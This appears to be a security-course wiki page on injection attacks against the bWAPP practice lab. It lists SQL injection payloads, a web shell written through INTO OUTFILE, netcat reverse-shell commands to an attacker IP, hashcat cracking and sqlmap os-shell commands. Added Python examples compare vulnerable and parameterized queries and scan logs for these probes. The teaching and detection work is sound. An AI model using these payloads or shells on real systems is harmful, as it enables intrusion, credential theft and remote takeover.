# App Vulnerabilities: Injection Attacks - Paiet/SEC-335 GitHub Wiki

- Injections
  - Command
  - Code
    - Leverages the application's coding language
    - DEMO: PHP Code Injection on bWAPP
      - Test with:
        - `phpinfo()`
        - `system("whoami")`
        - `nc -nv attackerIP port -e /bin/bash`
## App Vulnerabilities: SQL Injection Attacks

- SQL
  - Login/Auth Bypass
  - Error-based
    - Testing for injection
      - The single-quote (`'`) is your friend
      - ORDER BY: `iron' order by 1 --`
        - Increase the number by 1 until you receive an error
        - Now you know how many columns the query returns
      - UNION ALL SELECT: `iron' union all select 1,2,3,4,5,6,7 --`
        - You can now see where the usable areas are: they will be selected for the output fields
        - `iron' union all select 1,user(),3,4,@@version,6,7 --`
      - TABLE enum: `...1,table_name,3,4,5,6,7 FROM information_schema.tables --`
      - COLUMN enum: `...1,column_name,3,4,5,6,7 FROM information_schema.columns WHERE table_name='users' --`
      - Read COLUMN info: `...1,login,3,4,password,6,7 FROM users --`
      - Save creds to file
      - Check hash type with hash-identifier and crack with hashcat: `hashcat -m 100 -a 0 nixPass.txt /usr/share/wordlists/rockyou.txt --force`
## App Vulnerabilities: Injection Attacks Pt.2

- Blind
  - Boolean
    - Try passing a TRUE statement (`' or 1=1 --`); if the command executes correctly then you know you're injecting SQL
    - Try passing a FALSE statement (`' or 1=2 --`)
  - Time-based
    - Try using the sleep function: `'-sleep(1) --`
    - If the site hangs, SQLi is possible
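The login/auth bypass from the SQL section and the boolean TRUE/FALSE probes above, shown from the defender's side as an added example (this is not code from the SEC-335 wiki or from bWAPP): a throwaway SQLite users table, a string-concatenated login query next to its parameterized replacement, and the outcome each produces for the same probe. The single-quote test and the UNION column-count mismatch from the error-based section are carried through as well, since they surface as SQL errors in the same way. The table, the users, the SHA1 password hashes and the `make_db`/`login_vulnerable`/`login_safe`/`probe`/`compare` names are all assumptions made for this demo.

```python
"""Added example for the SEC-335 notes (not bWAPP's code): the same login
probes run against a string-built query and a parameterized one.
Table, users, hashes and function names are constructed for this demo."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table; passwords stored as SHA1 hex digests."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    for login, pw in [("neo", "trinity"), ("bee", "bug")]:
        conn.execute(
            "INSERT INTO users (login, password) VALUES (?, ?)",
            (login, hashlib.sha1(pw.encode()).hexdigest()),
        )
    return conn


def login_vulnerable(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Injectable form: user input is spliced into the SQL text, so a quote
    breaks out of the literal and a trailing '--' comments out the rest."""
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    sql = (
        "SELECT id FROM users WHERE login = '" + login + "' "
        "AND password = '" + pw_hash + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Parameterized form: the driver binds the values, so the payload is only
    ever compared as a literal string against the login column."""
    pw_hash = hashlib.sha1(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT id FROM users WHERE login = ? AND password = ?", (login, pw_hash)
    ).fetchone()
    return row is not None


def probe(conn, login_fn, payload: str) -> str:
    """Classify the outcome of a login attempt that uses `payload` as the
    username together with a deliberately wrong password."""
    try:
        return "granted" if login_fn(conn, payload, "wrong-password") else "denied"
    except sqlite3.Error:
        # The error-based technique depends on this reaching the client;
        # a hardened app logs it server-side and returns a generic failure.
        return "sql-error"


def compare(payload: str) -> tuple:
    """(outcome with the vulnerable query, outcome with the parameterized one)."""
    conn = make_db()
    return probe(conn, login_vulnerable, payload), probe(conn, login_safe, payload)


if __name__ == "__main__":
    for p in ["neo", "'", "' or 1=1 --", "' or 1=2 --",
              "' union all select 1 --", "' union all select 1,2 --"]:
        vuln, safe = compare(p)
        print(f"{p!r:30} vulnerable={vuln:10} parameterized={safe}")
```

Binding parameters fixes the query structure, but it does not make the database's error messages safe to show to users, which is the other half of the error-based technique; the `except` branch above is where a real application should log internally and return a generic message.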
- READ/WRITE/CODE_EXEC
  - READ from file
    - `union all select 1,load_file("/etc/passwd"),3,4,5,6,7 --`
    - View source for better formatting of the output
  - WRITE to file
    - `union all select 1,"Test",3,4,5,6,7 into OUTFILE '/var/www/test.txt'`
    - You may get permission denied
      - Try to find another directory with write perms: `dirb http://10.0.0.175/bWAPP/ /usr/share/wordlists/dirb/big.txt`
      - Trial and error through any listed directories
      - Found writable dir: `/var/www/bWAPP/documents`
      - CODE EXEC may now be possible :)
  - CODE EXEC
    - `union all select 1,"<?php echo shell_exec($_GET['cmd']); ?>",3,4,5,6,7 into OUTFILE '/var/www/bWAPP/documents/revshell.php'`
    - Start a listener on port 4444
    - Now browse to your backdoor and execute a command: `http://10.0.0.175/bWAPP/documents/revshell.php?cmd=nc -nv 10.0.0.169 4444 -e /bin/bash`
- SQLMap
  - Scan DB using POST: `sqlmap --cookie="security_level=0; PHPSESSID=2ecf6671bdeb964ae7675639a0e7801a" --data "title=Iron+Man&action=search" -u "http://10.0.0.175/bWAPP/sqli_6.php" -D bWAPP --dump`
  - Get OS shell: `sqlmap --cookie="security_level=0; PHPSESSID=2ecf6671bdeb964ae7675639a0e7801a" --data "title=Iron+Man&action=search" -u "http://10.0.0.175/bWAPP/sqli_6.php" -D bWAPP --os-shell`
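The probe strings collected across these notes (the PHP code-injection tests from the first section, the ORDER BY / UNION / information_schema / load_file / INTO OUTFILE payloads, the boolean and sleep probes, the `revshell.php?cmd=` fetch, and the sqlmap runs) are exactly what a defender should be looking for in web-server logs. The following is an added detection example, not code from the SEC-335 wiki or bWAPP: it parses combined-format access log lines, URL-decodes the request, and tags each line with the indicator it matches. The log lines are constructed; the paths other than those in the notes, the second client IP, the timestamps and the sqlmap user-agent version are made up, and `LOG_RE`, `INDICATORS`, `classify_request`, `scan_log` and `hits_per_ip` are names chosen for this demo.

```python
"""Added detection example (not from the SEC-335 wiki): scan web-server access
logs for the injection probe strings the notes use. Sample log is constructed."""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Each rule is (tag, pattern) applied to the URL-decoded request path and query.
INDICATORS = [
    ("sqli-order-by", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("sqli-boolean", re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("sqli-time", re.compile(r"\bsleep\s*\(", re.I)),
    ("sqli-schema-enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("sqli-file-io", re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I)),
    ("code-injection", re.compile(r"\b(phpinfo|system|shell_exec)\s*\(", re.I)),
    ("webshell-use", re.compile(r"\.php\?cmd=", re.I)),
]
# sqlmap announces itself in its default User-Agent unless told otherwise.
UA_TOOLS = re.compile(r"sqlmap", re.I)

# Constructed sample: one benign search, then the probes from the notes.
SAMPLE_LOG = """\
10.0.0.50 - - [12/Mar/2019:10:14:40 +0000] "GET /bWAPP/search.php?title=Iron+Man&action=search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:15:09 +0000] "GET /bWAPP/search.php?title=iron%27+order+by+8+--&action=search HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:15:33 +0000] "GET /bWAPP/search.php?title=iron%27+union+all+select+1%2Cuser%28%29%2C3%2C4%2C%40%40version%2C6%2C7+--&action=search HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:16:02 +0000] "GET /bWAPP/search.php?title=iron%27+union+all+select+1%2Ctable_name%2C3%2C4%2C5%2C6%2C7+FROM+information_schema.tables+--&action=search HTTP/1.1" 200 9932 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:16:30 +0000] "GET /bWAPP/search.php?title=%27+or+1%3D1+--&action=search HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:16:55 +0000] "GET /bWAPP/search.php?title=%27-sleep%281%29+--&action=search HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:17:45 +0000] "GET /bWAPP/code_injection.php?message=phpinfo%28%29 HTTP/1.1" 200 88120 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:18:10 +0000] "GET /bWAPP/documents/revshell.php?cmd=whoami HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.0.0.169 - - [12/Mar/2019:10:19:00 +0000] "POST /bWAPP/sqli_6.php HTTP/1.1" 200 5120 "-" "sqlmap/1.3.3#stable (http://sqlmap.org)"
"""


def classify_request(decoded_path: str, user_agent: str) -> list:
    """Tags for one request; empty list means nothing matched."""
    tags = [tag for tag, rx in INDICATORS if rx.search(decoded_path)]
    if UA_TOOLS.search(user_agent):
        tags.append("tool-user-agent")
    return tags


def scan_log(text: str) -> list:
    """One finding per suspicious line: (line_no, client_ip, tags, decoded_path)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; in production count these rather than drop them
        decoded = unquote_plus(m["path"])  # %27 -> ', + -> space, %2C -> ,
        tags = classify_request(decoded, m["ua"])
        if tags:
            findings.append((n, m["ip"], tags, decoded))
    return findings


def hits_per_ip(findings: list) -> dict:
    """Number of flagged lines per client; a burst from one IP is the usual signal."""
    counts = {}
    for _, ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for line_no, ip, tags, decoded in hits:
        print(f"line {line_no:2} {ip:12} {','.join(tags):30} {decoded}")
    print(hits_per_ip(hits))
```

Two gaps worth knowing about: the POST bodies that sqlmap sends with `--data` never reach an access log, so the last line is caught only by its User-Agent, and the time-based `sleep` probe is invisible unless the server logs response time (Apache's `%D`, for example). Pair this with application-level or WAF logging of request bodies and a latency field, and alert on the per-IP burst rather than on any single tag.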